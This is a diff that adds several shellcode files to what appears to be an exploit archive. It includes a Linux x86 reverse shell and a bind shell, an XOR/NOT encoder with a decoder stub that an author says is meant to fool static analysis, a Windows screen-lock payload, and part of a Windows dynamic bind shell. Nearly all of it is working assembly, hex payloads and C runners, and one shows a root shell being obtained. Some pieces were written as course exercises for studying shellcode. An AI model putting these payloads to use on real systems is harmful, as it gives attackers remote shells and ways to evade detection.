index 000000000..fcaf88fe0
--- /dev/null
+++ b/shellcodes/linux_x86/47352.c
@@ -0,0 +1,210 @@
+/*
+; name       : Exploit Title: Linux/x86 - TCP reverse shell 127.0.0.1 nullbyte free
+; date       : 04th sept, 2019
+; author     : Sandro "guly" Zaccarini
+; twitter    : @theguly
+; blog       : https://gulyslae.github.io/
+; SLAE32     : SLAE-1037
+; purpose    : the program will create a new connection to 127.0.0.1:4444 and spawns a shell
+;              this code has been written as extramile for SLAE32 assignment 2
+; license    : CC-BY-NC-SA
+
+  global _start
+    section .text
+
+      _start:
+      ; start by zeroing eax,ebx. not really needed because registers are clean, but better safe than sorry
+      xor eax,eax
+      xor ebx,ebx
+
+      ; ----------------------------------------------------------------------------------------
+      ; purpose     : create a socket
+      ; references  : man socket
+      ; description :
+      ; socketcall is the syscall used to work with socket. i'm going to use this syscall to create and connect
+      ; the very first thing i have to do, is to create the socket itself. by reading references, i see that she needs 3 registers:
+      ; eax => syscall id 0x66 for socketcall, that will be the same for every socketcall call of course and that's why i created a function on top
+      ; ebx => socket call id, that is 0x1 for socket creation
+      ; ecx => pointer to socket args
+      ;
+      ; man socket shows me that socket's args are:
+      ; domain   => AF_INET because i'm creating a inet socket, and is 0x2
+      ; type     => tcp is referenced as STREAM, that is 0x1
+      ; protocol => unneded here because there is no inner protocol, so i'll use 0x0
+
+      ; not, i'm creating ecx because a zeroed eax is perfect for the purpose
+      ; arg will be pushed in reverse order with no hardcoded address: 0, 1, 2
+      push eax
+      inc eax
+      push eax
+      inc eax
+      push eax
+
+      ; because socketcall needs a pointer, i'm moving esp address to ecx
+      mov ecx,esp
+
+      ; prepare eax to hold the socketcall value as discussed before. i'm not hardcoding 0x66 to (try to) fool some static analysis: 0x33 is sysacct and looks harmless to me
+      mov al,0x33
+      add al,0x33
+
+      ; because ebx has been zeroed, i can just inc to have it to 1 for socketcall to call socket (pun intended :) )
+      inc ebx
+
+      ; do the call and create socket
+      int 0x80
+
+      ; because syscall rets to eax, if everything's good, eax will hold socket file descriptor: save it to esi to store it safe for the whole run
+      mov esi,eax
+
+      ; ----------------------------------------------------------------------------------------
+      ; purpose     : connect to raddr:rport
+      ; references  : man connect , man 7 ip
+      ; description :
+      ; eax => syscall id 0x66 for socketcall
+      ; ebx => connect call id, 0x3 taken from linux/net.h
+      ; ecx => pointer to address struct
+      ;
+      ; man connect shows me that args are:
+      ; sockfd  => already saved in esi
+      ; address => pointer to ip struct
+      ; addrlen => addrlen is 32bit (0x10)
+      ;
+      ; man 7 ip shows address struct details. arguments are:
+      ; family => AF_INET, so 0x2
+; port   => hardcoded 4444
+; addr   => 127.0.0.1
+
+; zero again
+xor eax,eax
+
+; push arg in reverse and move the pointer to ecx
+; prepare stack pointer to addr struct defined in man 7 ip
+; as exercise, i'm going to use 127.0.0.1 as remote address, because it contains null bytes
+; hex value of 127.0.0.1 is 0x0100007f
+; pushing 0x00000000 to esp by using a known null register. i've also could used sub esp,0x8 because i have enough room, or mov eax,[esp] or another zillion of similal instructions
+push eax
+mov byte [esp], 0x7f
+; now esp is: 0x0000007f
+mov byte [esp+3],0x01
+; now esp is: 0x0100007f
+
+; push port to bind to, 4444 in hex, to adhere to msf defaults :)
+push word 0x5c11
+; push AF_INET value as word again
+inc ebx
+push word bx
+; get stack pointer to ecx
+mov ecx,esp
+
+; same call to have 0x66 to eax and do socketcall
+mov al,0x33
+add al,0x33
+
+; push arg, again in reverse order
+push eax
+; pointer to addr struct
+push ecx
+; sockfd, saved before to esi
+push esi
+; stack pointer to ecx again, to feed bind socketcall
+mov ecx,esp
+
+; ebx is 0x2, i need 0x3
+inc ebx
+
+; do the call
+int 0x80
+
+; ----------------------------------------------------------------------------------------
+; purpose     : create fd used by /bin//sh
+; references  : man dup2
+; description : every shell has three file descriptor: STDIN(0), STDOUT(1), STDERR(2)
+; this code will create said fd
+; eax => 0x3f
+; ebx => clientid
+; ecx => newfd id, said file descriptor
+;
+; i'm going to create them by looping using ecx, to save some instruction. ecx will start at 2, then is dec and fd is created.
+; as soon as ecx is 0, the loop ends
+
+
+; i'm using a different method from one i've used for bindshell just to try.
+; i'll put 0x3 to ecx to start creating STDERR just after dec
+; ecx is dirty but edx is 0x0, just swap them
+; edit: actually, running from a C code you'll have edx dirty. zero it...
+xor edx,edx
+xchg ecx,edx
+mov cl,0x3
+
+; copy socket fd to ebx to feed clientid
+mov ebx,esi
+
+; zero eax and start the loop
+xor eax,eax
+
+; dup2 call id
+mov al,0x3f
+; dec ecx to have 2,1,0
+dec ecx
+int 0x80
+
+mov al,0x3f
+; dec ecx to have 2,1,0
+dec ecx
+int 0x80
+
+mov al,0x3f
+; dec ecx to have 2,1,0
+dec ecx
+int 0x80
+
+; ----------------------------------------------------------------------------------------
+; purpose     : spawn /bin//sh
+; references  : man execve
+; description : put /bin//sh on the stack, aligned to 8 bytes to prevent 0x00 in the shellcode itself
+; and null terminating it by pushing a zeroed register at first
+; eax => execve call, 0xB
+; ebx => pointer to executed string, which will be /bin//sh null terminated
+; ecx => pointer to args to executed command, that could be 0x0
+; edx => pointer to environment, which could be 0x0
+;
+; i need to push a null byte to terminate the string, i know ecx is 0x0 so i can save one op
+push ecx
+push 0x68732f2f
+push 0x6e69622f
+; here the stack will looks like a null terminated /bin/sh:
+; /bin//sh\0\0\0\0\0\0\0\0
+
+; and place pointer to ebx
+mov ebx,esp
+
+; envp to edx and ecx
+push ecx
+mov edx,esp
+push ecx
+mov ecx,esp
+
+; execve syscall here
+mov al,0xB
+
+; and pop shell
+int 0x80
+
+; neat exit
+xor eax,eax
+mov al,0x1
+int 0x80
+
+*/
+
+#include <stdio.h>
+#include <string.h>
+
+unsigned char buf[] = "\x31\xc0\x31\xdb\x50\x40\x50\x40\x50\x89\xe1\xb0\x33\x04\x33\x43\xcd\x80\x89\xc6\x31\xc0\x50\xc6\x04\x24\x7f\xc6\x44\x24\x03\x01\x66\x68\x11\x5c\x43\x66\x53\x89\xe1\xb0\x33\x04\x33\x50\x51\x56\x89\xe1\x43\xcd\x80\x31\xd2\x87\xca\xb1\x03\x89\xf3\x31\xc0\xb0\x3f\x49\xcd\x80\xb0\x3f\x49\xcd\x80\xb0\x3f\x49\xcd\x80\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x89\xe2\x51\x89\xe1\xb0\x0b\xcd\x80\x31\xc0\xb0\x01\xcd\x80";
+
+
+void main() {
+  printf("Shellcode Length:  %d\n", strlen(buf));
+  int (*ret)() = (int(*)())buf;
+  ret();
+}
\ No newline at end of file
diff --git a/shellcodes/linux_x86/47396.c b/shellcodes/linux_x86/47396.c
new file mode 100644
index 000000000..e900b4bd6
--- /dev/null
+++ b/shellcodes/linux_x86/47396.c
@@ -0,0 +1,134 @@
+#---------------------- DESCRIPTION -------------------------------------#
+
+; Title: Linux/x86 bind tcp shellcode (port 43690) null-free 
+; Author: Daniel Ortiz
+; Tested on: Linux 4.18.0-25-generic #26 Ubuntu
+; Size: 53 bytes
+; SLAE ID: PA-9844
+
+
+
+section .DATA
+
+section .BSS
+
+
+section .TEXT
+
+global _start
+
+  _start:
+
+  ; int socket(int domain, int type, int protocol); 
+
+  xor eax, eax
+  xor ebx, ebx
+  cdq
+
+  push eax              ; protocol - 0
+  push byte 0x1         ; type - SOCK_STREAM
+  push byte 0x2         ; dominio - AF_INET
+  
+  mov ecx, esp          
+  inc bl                ; sys_socket 
+  mov al, 102           ; socketcall system call
+  int 0x80
+
+  mov esi, eax ; save the socketfd
+  
+  ; bind(soc, (struct sockaddr *)&srv_addr, 0x10)
+
+
+  push edx
+  push word 0xAAAA
+  push word 2
+  mov ecx, esp
+  push byte 0x10        ; last argument
+  push ecx              ; pointer to the structure
+  push esi              ; socketfd 
+  mov ecx, esp    
+  inc bl                ; bl contains 2
+  mov al, 102
+  int 0x80
+
+
+  ; int listen(int sockfd, int backlog);
+
+  push edx
+  push esi
+  mov ecx, esp
+  mov bl, 0x4         ; bl contains 4
+  mov al, 102
+  int 0x80
+
+  ; int accept(int sockfd, struct sockaddr *addr, socklen_t *addrlen)
+  
+  push edx
+  push edx
+  push esi            ; socketfd
+  mov ecx, esp
+  inc bl              ; bl contains 5 
+  mov al, 102
+  int 0x80
+  mov ebx, eax
+
+  ; int dup2(int oldfd, int newfd, int flags);
+
+  xor ecx, ecx
+  mov cl, 3
+  l00p:
+    dec cl
+    mov al, 63
+    int 0x80
+    jnz l00p
+
+
+  ; int execve(const char *filename, char *const argv[],char *const envp[]) 
+
+  push edx
+  push long 0x68732f2f
+  push long 0x6e69622f
+  mov ebx, esp
+  push edx
+  push edx
+  mov ecx, esp
+  mov al, 0x0b
+  int 0x80
+
+
+  ; exit syscall
+  xor eax, eax
+  mov al, 0x1
+  mov bl, 0x8
+  int 0x80
+
+/*
+
+shellcode.c program 
+
+*/
+
+#include<stdio.h>
+#include<string.h>
+
+unsigned char code[] = \
+
+"\x31\xc0\x31\xdb\x99\x50\x6a\x01\x6a\x02\x89\xe1\xfe\xc3\xb0\x66"
+"\xcd\x80\x89\xc6\x52\x66\x68\xaa\xaa\x66\x6a\x02\x89\xe1\x6a\x10"
+"\x51\x56\x89\xe1\xfe\xc3\xb0\x66\xcd\x80\x52\x56\x89\xe1\xb3\x04"
+"\xb0\x66\xcd\x80\x52\x52\x56\x89\xe1\xfe\xc3\xb0\x66\xcd\x80\x89"
+"\xc3\x31\xc9\xb1\x03\xfe\xc9\xb0\x3f\xcd\x80\x75\xf8\x52\x68\x2f"
+"\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x52\x89\xe1\xb0\x0b"
+"\xcd\x80\x31\xc0\xb0\x01\xb3\x08\xcd\x80";              
+   
+
+main()
+{
+
+        printf("Shellcode Length:  %d\n", strlen(code));
+
+        int (*ret)() = (int(*)())code;
+
+        ret();
+
+}
\ No newline at end of file
diff --git a/shellcodes/linux_x86/47461.c b/shellcodes/linux_x86/47461.c
new file mode 100644
index 000000000..ffd2b0e80
--- /dev/null
+++ b/shellcodes/linux_x86/47461.c
@@ -0,0 +1,191 @@
+# Date: 4th October 2019
+# Shellcode Author: @bolonobolo - https://bolonobolo.github.io
+# Tested on: Linux x86
+
+######################## execve.asm ###############################
+
+global _start			
+
+section .text
+_start:
+	
+	
+	; put NULL bytes in the stack
+	xor eax, eax
+	push eax
+	
+	//bin/sh
+	push 0x68732f6e
+	push 0x69622f2f
+	mov ebx, esp
+	
+	; push NULL in the EDX position
+	push eax
+	mov edx, esp
+
+	; push in the stack and then move it in ECX
+	push ebx
+	mov ecx, esp
+
+	; call the execve syscall
+	mov al, 11
+	int 0x80
+###############################################################
+
+compile the execve-stack
+$ nasm -f elf32 execve.asm
+$ ld -N -o sh execve.o
+$ echo;objdump -d ./execve|grep '[0-9a-f]:'|grep -v 'file'|cut -f2
+-d:|cut -f1-6 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/
+/\\x/g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g';echo
+
+"\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80"
+
+########################## encoder_mixer.py ####################
+
+#!/usr/bin/python
+
+# Python Encoder (XOR + NOT + Random)
+import random
+green = lambda text: '\033[0;32m' + text + '\033[0m'
+
+shellcode =
+("\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80")
+encoded = ""
+
+# The end char is 0xaa
+end = "\\xaa"
+
+print 'Encoded shellcode ...'
+
+for x in bytearray(shellcode) :
+
+        if x < 128:
+                # XOR Encoding with 0xDD
+                x = x^0xDD
+                # placeholder for XOR is 0xbb
+                encoded += '\\xbb'
+                encoded += '\\x'
+                encoded += '%02x' % x
+        else:
+		# NOT encoding
+                x = ~x
+		# placeholder for NOT is 0xcc
+                encoded += '\\xcc'
+                encoded += '\\x'
+                encoded += '%02x' % (x & 0xff)
+
+	 # 0xaa is 170 in dec and the others placeholders are > of 170
+        encoded += '\\x%02x' % random.randint(1,169)
+
+print green("Shellcode Len: %d" % len(bytearray(shellcode)))
+print green("Encoded Shellcode Len: %d" % len(bytearray(encoded)))
+encoded = encoded + end
+print encoded
+nasm = str(encoded).replace("\\x", ",0x")
+nasm = nasm[1:]
+# end string char is 0xaa
+print green("NASM version:")
+# end = end.replace("\\x", ",0x")
+print nasm
+
+###################################################################
+
+root@root:$ ./encoder_mixer.py
+Encoded shellcode ...
+Shellcode Len: 25
+Encoded Shellcode Len: 300
+\xbb\xec\x26\xcc\x3f\x4a\xbb\x8d\x3d\xbb\xb5\x44\xbb\xb3\x5b\xbb\xf2\x65\xbb\xae\x09\xbb\xb5\x2a\xbb\xb5\x2b\xbb\xf2\x1a\xbb\xf2\x4d\xbb\xbf\x9a\xbb\xb4\x61\xcc\x76\x56\xcc\x1c\x59\xbb\x8d\x56\xcc\x76\x6c\xcc\x1d\x94\xbb\x8e\x02\xcc\x76\xa5\xcc\x1e\x6d\xcc\x4f\xa3\xbb\xd6\x22\xcc\x32\x18\xcc\x7f\x7b\xaa
+NASM version:
+0xbb,0xec,0x26,0xcc,0x3f,0x4a,0xbb,0x8d,0x3d,0xbb,0xb5,0x44,0xbb,0xb3,0x5b,0xbb,0xf2,0x65,0xbb,0xae,0x09,0xbb,0xb5,0x2a,0xbb,0xb5,0x2b,0xbb,0xf2,0x1a,0xbb,0xf2,0x4d,0xbb,0xbf,0x9a,0xbb,0xb4,0x61,0xcc,0x76,0x56,0xcc,0x1c,0x59,0xbb,0x8d,0x56,0xcc,0x76,0x6c,0xcc,0x1d,0x94,0xbb,0x8e,0x02,0xcc,0x76,0xa5,0xcc,0x1e,0x6d,0xcc,0x4f,0xa3,0xbb,0xd6,0x22,0xcc,0x32,0x18,0xcc,0x7f,0x7b,0xaa
+
+#################### decoder_mixer.asm ############################
+
+global _start			
+
+section .text
+_start:
+
+
+	jmp short call_decoder
+	
+	
+decoder:
+        ; the sequence of the chars in shellcode is:
+	; placehlder,obfuscated shellcode char,random char
+	pop esi
+        lea edi, [esi]
+        xor eax, eax
+        xor ebx, ebx
+
+switch:
+
+        mov bl, byte [esi + eax]
+        cmp bl, 0xaa
+        jz shellcode
+        cmp bl, 0xbb
+        jz xordecode
+        jmp notdecode
+
+xordecode:
+
+        mov bl, byte [esi + eax + 1]
+        mov byte [edi], bl
+        xor byte [edi], 0xDD
+        inc edi
+        add al, 3
+        jmp short switch
+
+notdecode:
+
+        mov bl, byte [esi + eax + 1]
+        mov byte [edi], bl
+        not byte [edi]
+        inc edi
+        add al, 3
+        jmp short switch
+
+call_decoder:
+	
+	call decoder
+	shellcode: db
+0xbb,0xec,0x73,0xcc,0x3f,0x9d,0xbb,0x8d,0x51,0xbb,0xb5,0x1b,0xbb,0xb3,0x22,0xbb,0xf2,0x79,0xbb,0xae,0x8e,0xbb,0xb5,0x61,0xbb,0xb5,0x3d,0xbb,0xf2,0x6e,0xbb,0xf2,0x9f,0xbb,0xbf,0x10,0xbb,0xb4,0x89,0xcc,0x76,0x2d,0xcc,0x1c,0x2f,0xbb,0x8d,0x91,0xcc,0x76,0x7e,0xcc,0x1d,0x92,0xbb,0x8e,0x80,0xcc,0x76,0x7b,0xcc,0x1e,0xa7,0xcc,0x4f,0x7f,0xbb,0xd6,0x2b,0xcc,0x32,0x24,0xcc,0x7f,0x37,0xaa
+
+############################### shellcode ############################
+
+$ nasm -f elf32 decoder_mixer.asm
+$ ld -o decoder decoder_mixer.o
+$ objdump -d ./decoder_mixer|grep '[0-9a-f]:'|grep -v 'file'|cut -f2
+-d:|cut -f1-6 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/
+/\\x/g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g'
+
+"\xeb\x31\x5e\x8d\x3e\x31\xc0\x31\xdb\x8a\x1c\x06\x80\xfb\xaa\x74\x27\x80\xfb\xbb\x74\x02\xeb\x0e\x8a\x5c\x06\x01\x88\x1f\x80\x37\xdd\x47\x04\x03\xeb\xe3\x8a\x5c\x06\x01\x88\x1f\xf6\x17\x47\x04\x03\xeb\xd6\xe8\xca\xff\xff\xff\xbb\xec\x73\xcc\x3f\x9d\xbb\x8d\x51\xbb\xb5\x1b\xbb\xb3\x22\xbb\xf2\x79\xbb\xae\x8e\xbb\xb5\x61\xbb\xb5\x3d\xbb\xf2\x6e\xbb\xf2\x9f\xbb\xbf\x10\xbb\xb4\x89\xcc\x76\x2d\xcc\x1c\x2f\xbb\x8d\x91\xcc\x76\x7e\xcc\x1d\x92\xbb\x8e\x80\xcc\x76\x7b\xcc\x1e\xa7\xcc\x4f\x7f\xbb\xd6\x2b\xcc\x32\x24\xcc\x7f\x37\xaa"
+
+## Put the hex code in a C script
+
+root@root:# cat shellcode.c
+#include<stdio.h>
+#include<string.h>
+
+unsigned char code[] = \
+"\xeb\x31\x5e\x8d\x3e\x31\xc0\x31\xdb\x8a\x1c\x06\x80\xfb\xaa\x74\x27\x80\xfb\xbb\x74\x02\xeb\x0e\x8a\x5c\x06\x01\x88\x1f\x80\x37\xdd\x47\x04\x03\xeb\xe3\x8a\x5c\x06\x01\x88\x1f\xf6\x17\x47\x04\x03\xeb\xd6\xe8\xca\xff\xff\xff\xbb\xec\x73\xcc\x3f\x9d\xbb\x8d\x51\xbb\xb5\x1b\xbb\xb3\x22\xbb\xf2\x79\xbb\xae\x8e\xbb\xb5\x61\xbb\xb5\x3d\xbb\xf2\x6e\xbb\xf2\x9f\xbb\xbf\x10\xbb\xb4\x89\xcc\x76\x2d\xcc\x1c\x2f\xbb\x8d\x91\xcc\x76\x7e\xcc\x1d\x92\xbb\x8e\x80\xcc\x76\x7b\xcc\x1e\xa7\xcc\x4f\x7f\xbb\xd6\x2b\xcc\x32\x24\xcc\x7f\x37\xaa";
+
+void main()
+{
+
+	printf("Shellcode Length:  %d\n", strlen(code));
+
+	int (*ret)() = (int(*)())code;
+
+	ret();
+
+}
+
+
+
+root@root# gcc -fno-stack-protector -z execstack shellcode.c -o shellcode
+root@root# ./shellcode
+Shellcode Length:  132
+# whoami
+root
+# exit
\ No newline at end of file
diff --git a/shellcodes/windows/47953.c b/shellcodes/windows/47953.c
new file mode 100644
index 000000000..7807aa510
--- /dev/null
+++ b/shellcodes/windows/47953.c
@@ -0,0 +1,31 @@
+# Title: Windows/7 - Screen Lock Shellcode (9 bytes)
+# Author: Saswat Nayak
+# Date: 2020-01-22
+# Shellcode length 9
+# Tested on: Win 7 SP1-64
+
+/*
+***** Assembly code follows *****
+xor eax,eax
+xor ebx,ebx
+xor ecx,ecx
+mov eax,0x00000002
+mov ebx,0x00020000
+push ebx
+push al
+mov ecx,0x77661497
+call ecx
+
+
+*/
+
+char code[]=
+
+"\x31\xC0\xB8\x6F\x86\x67\x77\xFF\xD0";
+
+int main(int argc, char **argv)
+ {
+int (*func)();
+func = (int (*)()) code;
+(int)(*func)();
+}
\ No newline at end of file
diff --git a/shellcodes/windows/47980.txt b/shellcodes/windows/47980.txt
new file mode 100644
index 000000000..2d5beefca
--- /dev/null
+++ b/shellcodes/windows/47980.txt
@@ -0,0 +1,429 @@
+# Shellcode Title: Windows/x86 - Dynamic Bind Shell + Null-Free Shellcode (571 Bytes)
+# Shellcode Author: Bobby Cooke
+# Date: 2020-01-30
+# Technique: PEB & Export Directory Table
+# Tested On: Windows 10 Pro (x86) 10.0.18363 Build 18363
+# Shellcode Function: When executed, this shellcode creates a cmd.exe bind shell, using the CreateProcessA function on TCP port 4444, on all IP interfaces.
+# Reason for Creating: When learning x86 Windows Dynamic Shellcoding, I experienced great difficulty in finding a detailed bind shell example to learn from. Their are many great examples for creating dynamic MessageBox shellcode, dynamic bind shellcode for x86 Linux, and many examples of Windows version dependent shellcode; with hardcoded library addresses. Metasploit has a great, compact, reliable, dynamic Windows x86 bind shellcode, but trying to reverse engineer it, to learn, is no small task. MetaSploits payload is great because it uses the best known shellcoding shortcut techniques. Unfortunately for the Security Researcher new to x86 Windows Shellcoding these shortcuts are very advanced concepts to take on right from the start. Hopefully this horribly large shellcode will help someone learn x86 Dynamic Windows shellcoding easier than the path I took.
+# Special Thanks & Credits to: Skape, 0xDarkVortex/paranoidninja, Corelan, Offensive Security, Vivek & Pentester Academy, Tulpa, sh3llc0d3r
+
+# Create a new stack frame
+ push ebp                ; push current base pointer to the stack
+ mov ebp, esp            ; Set Base Stack Pointer for new Stack-Frame
+ sub esp, 0x60           ; Decrement the stack by 96 to create space for saving pointers 
+
+# Push string "GetProcAddress",0x00 onto the stack
+ xor eax, eax            ; clear eax register
+ mov ax, 0x7373          ; AX is the lower 16-bits of the 32bit EAX Register
+ push eax                ;   ss : 73730000 // EAX = 0x00007373 // \x73=ASCII "s"      
+ push 0x65726464         ; erdd : 65726464 // "GetProcAddress"
+ push 0x41636f72         ; Acor : 41636f72
+ push 0x50746547         ; PteG : 50746547
+ mov [ebp-0x4], esp      ; save PTR to string at bottom of stack (ebp)
+
+# Find Base Address of the kernel32.dll Dynamically Linked Library
+; - In Windows, the FS Segment Register will always point to the Thread Environment Block (TEB).
+; - This shellcode is dynamic & does not rely on any hardcoded addresses.
+;   - The addresses in the comments are used as an example and will be different for you.
+; - The easiest way to get the WinDbg commands to work is to connect to the Windows Symbol Server.
+; - On new versions of Windows, kernel32.dll is the 3rd dll in the Initialization Order Module List.
+;   - On older versions of Windows, kernel32.dll was the 2nd dll. Now the 2nd dll is kernelbase.dll.
+;     - Interestingly kernelbase.dll also has functions like LoadLibraryA & GetProcAddress.
+;     - kernelbase.dll can be used instead of kernel32.dll sometimes, but we will stick with kernel32.dll.
+ xor eax, eax            ; clear eax register
+ mov eax, [fs:eax+0x30]  ; #1| Get PEB Address from within the TEB; leveraging the FS Register.
+                         ; WinDbg> !teb
+                         ;  TEB at 002e9000
+                         ; WinDbg> dt nt!_TEB 002e9000
+                         ;  +0x030 ProccessEnviromentBlock: 0x002e8000 _PEB 
+                         ; EAX = 0x002e8000 (Address_of_PEB)
+ mov eax, [eax+0xc]      ; #2| Get the LDR Address from within the PEB.
+                         ; WinDbg> dt nt!_PEB 002e8000 
+                         ;  +0x00c Ldr : 0x77becb80 _PEB_LDR_DATA
+                         ; EAX = 0x77becb80 (Address_of_LDR)
+ mov eax, [eax+0x1c]     ; #3| Get the first entry in the Initialization Order Module List (ntdll.dll)
+                         ; WinDbg> dt nt!_PEB_LDR_DATA 0x77becb80 
+                         ;  +0x01c InInitializationOrderModuleList : _LIST_ENTRY
+                         ; WinDbg> db 0x77becb80+1c
+                         ;  77becb9c  90 1d 5f 00  // First Entry is 0x005f1d90 (reverse for Little Endian)
+                         ; WinDbg> db 0x5f1d90
+                         ;           #00#01#02#03#04#05#06#07#08#09#0a#0b
+                         ;  005f1d90  38 26 5f 00 9c cb be 77-00 00 ad 77
+                         ;  - we see that 0x5f1d90+0x8 is the base address of ntdll.dll - 0x77ad0000
+                         ;    - ModLoad: 77ad0000 ntdll.dll
+                         ;  - We also see that the next entry in the list is at 0x005f2638
+                         ; EAX = 0x005f1d90 (First Entry of InInitialzationOrderModuleList - ntdll.dll)
+                         ; #4| Get the second entry in the Initialization Order Module List (kernelbase.dll)
+ mov ebx, eax            ; - Should be 'mov eax, [eax]', but the opcode contains a null byte 8B00
+ mov eax, [ebx]          ;   - Avoid null byte
+                         ; WinDbg> dt nt!_LIST_ENTRY 0x5f1d90
+                         ;   +0x000 Flink            : 0x005f2638 _LIST_ENTRY
+                         ; WinDbg> db 0x005f2638
+                         ;  005f2638  78 22 5f 00 90 1d 5f 00-00 00 56 75 
+                         ; - We see that 0x005f2638+0x8 is the base address of kernelbase.dll - 0x75560000
+                         ;   - ModLoad: 75560000 C:\Windows\System32\KERNELBASE.dll
+                         ;  - We also see that the next entry in the list is at 0x005f2278
+                         ; EAX = 0x005f2638 (Second Entry of InInitialzationOrderModuleList - kernelbase.dll)
+                         ; #5| Get the third entry in the Initialization Order Module List (kernel32.dll)
+ mov ebx, eax            ; - Should be 'mov eax, [eax]', but the opcode contains a null byte 8B00
+ mov eax, [ebx]          ;   - Avoid null byte
+                         ; WinDbg> dt nt!_LIST_ENTRY 0x005f2638
+                         ;  +0x000 Flink            : 0x005f2278 _LIST_ENTRY
+                         ; WinDbg> db 0x005f2278
+                         ; 005f2278  9c cb be 77 38 26 5f 00-00 00 22 76 
+                         ; - We see that 0x005f2278+0x8 is the base address of kernel32.dll - 0x76220000
+                         ;   - ModLoad: 76220000 C:\Windows\System32\KERNEL32.DLL
+                         ; EAX = 0x005f2278 (Third Entry of InInitialzationOrderModuleList - kernel32.dll)
+ mov eax, [eax+0x8]      ; move the kernel32.dll base address into the EAX register
+                         ; EAX = 0x76220000 (Base address of kernel32.dll)
+ mov [ebp-0x8], eax      ; Save the base address of kernel32.dll in the 2nd from bottom position on our stack
+
+# Find Base Address of GetProcAddress Symbol
+; - Now that we have the base address of kernel32.dll, we will use it to find the address for the Symbol(function) GetProcAddress.
+;   - GetProcAddress() will then be used to find the addresses of all other Symbols(functions) that we need.
+;   - The Export Table technique is used to find the address of GetProcAddress (as detailed in Skapes Windows Shellcoding Paper).
+ mov ebx, [eax+0x3c]     ; save Relative Virtual Address (RVA/Offset) of New_Exe_Header to ebx.
+                         ;  WinDbg> db 0x76220000+3c
+                         ;   7622003c  f8 00 00 00  // EBX = 0x000000f8 = Offset to New EXE Header
+ add ebx, eax            ; (kernel32.dll baseAddr) + (RVA New_Exe_Header) = Address of New_Exe_Header
+                         ;        0x76220000       +        0xf8          =       0x762200f8 
+                         ; EBX =  0x762200f8 (Address of new  Header)
+ mov ebx, [ebx+0x78]     ; (RVA of New Exe Header) + 0x78 = RVA of Export-Table
+                         ; WinDbg> db 0x762200f8+0x78
+                         ;  76220170  b0 77 07 00   // EBX = 0x000777b0
+ add ebx, eax            ; (kernel32.dll baseAddr) + (RVA Export-Table) = Address of Export-Table
+                         ;        0x76220000       +    0x000777b0        =       0x762977b0  
+                         ; EBX now holds the address of the Export Table for kernel32.dll (0x762977b0)
+ mov edi, [ebx+0x20]     ; PTR to RVA of Name-Pointer Table
+                         ; WinDbg> db 0x762977b0+0x20
+                         ;  762977d0  e0 90 07 00   // EDI = 0x000790e0
+ add edi, eax            ; (kernel32.dll baseAddr) + (RVA Name-Pointer Table) = Address of Name-Pointer Table
+                         ;        0x76220000       +    0x000790e0        =       0x762990e0  
+ mov [ebp-0xC], edi      ; save Address of Name-Pointer Table in the 3rd from bottom position in our stack-frame
+ mov ecx, [ebx+0x24]     ; PTR to RVA of Ordinal Table
+ add ecx, eax            ; (kernel32.dll baseAddr) + (RVA Ordinal Table) = Address of Ordinal Table
+ mov [ebp-0x10], ecx     ; save PTR to Ordinal Table Address at 4th from bottom of stack (ebp-16)
+
+ mov edx, [ebx+0x1c]     ; PTR to RVA of Address Table
+ add edx, eax            ; (kernel32.dll baseAddr) + (RVA Address Table) = Address of Address Table
+ mov [ebp-0x14], edx     ; save PTR to Address Table Address at 5th from bottom of stack (ebp-20)
+
+ mov edx, [ebx+0x14]     ; Value of Number of Functions/Symbols within the Tables
+
+ xor eax, eax            ; Counter = 0
+
+loop:
+ mov edi, [ebp-0xC]      ; Address of the Name-Pointer Table
+ mov esi, [ebp-0x4]      ; PTR to string "GetProcAddress",0x00
+ xor ecx, ecx            ; clear ecx register -- used for counters/loops
+ cld                     ; clear direction flag, DF=0 -- Process strings from left to right
+ mov edi, [edi+eax*4]    ; Entries in Name Pointer Table are 4 bytes long
+                         ; edi = RVA of Nth entry = (Address of Name-Pointer Table) + (Counter * 4)
+ add edi, [ebp-0x8]      ; edi = address of string = (kernel32.dll base addr) + (RVA of Nth entry)
+ add cx, 0xf             ; ecx = length of string to compare = sizeof("GetProcAddress") = 15 (14 Letters + 1 String Terminator Char)
+ repe cmpsb              ; compare first 15 bytes of string. esi cmp edi
+                         ; if equal ZF=1, if not ZF=0
+ jz found                ; if strings match end loop, else increment eax and loop again
+ inc eax                 ; counter ++
+ cmp eax, edx            ; check if eax = Value of Number of Functions/Symbols within the Tables
+ jb loop                 ; If eax != edx, restart the loop
+
+found:
+; The Counter (eax) now holds the poisition of GetProcAddress within the table
+ mov ecx, [ebp-0x10]     ; ecx = Address of Ordinal Table
+ mov edx, [ebp-0x14]     ; edx = Address of Address Table
+ mov ax, [ecx + eax*2]   ; ax = ordinal number = (Address of Ordinal Table) + (counter * 2)
+ mov eax, [edx + eax*4]  ; eax = RVA of function = var20 + (ordinal * 4)
+ add eax, [ebp-0x8]      ; eax = address of GetProcAddress = (RVA of GetProcAddress) + (kernel32.dll base addr)
+;   Address of GetProcAddress is now in EAX
+ mov [ebp-0x18], eax     ; save Address of GetProcAddress onto Stack 0x18=24; 6th from bottom
+
+; Call GetProcAddress(&kernel32.dll, PTR "LoadLibraryA"0x00)
+; Call GetProcAddress(hModule, lpProcName)
+;   hModule:    address of the DLL module that contains the function.
+;   lpProcName: A Pointer to the beginning of an ASCII string of the functions name; null terminated.
+ xor edx, edx            ; EDX = 0x00000000
+ push edx                ; null terminator for LoadLibraryA string
+ push 0x41797261         ; Ayra : 41797261 // "LoadLibraryA",0x00
+ push 0x7262694c         ; rbiL : 7262694c
+ push 0x64616f4c         ; daoL : 64616f4c
+ push esp                ; $hModule    -- push the address of the start of the string onto the stack
+ push dword [ebp-0x8]    ; $lpProcName -- push base address of kernel32.dll to the stack
+ mov eax, [ebp-0x18]     ; Move the address of GetProcAddress into the EAX register
+ call eax                ; Call the GetProcAddress Function.
+                         ; The address of the queried function is returned into the EAX register.
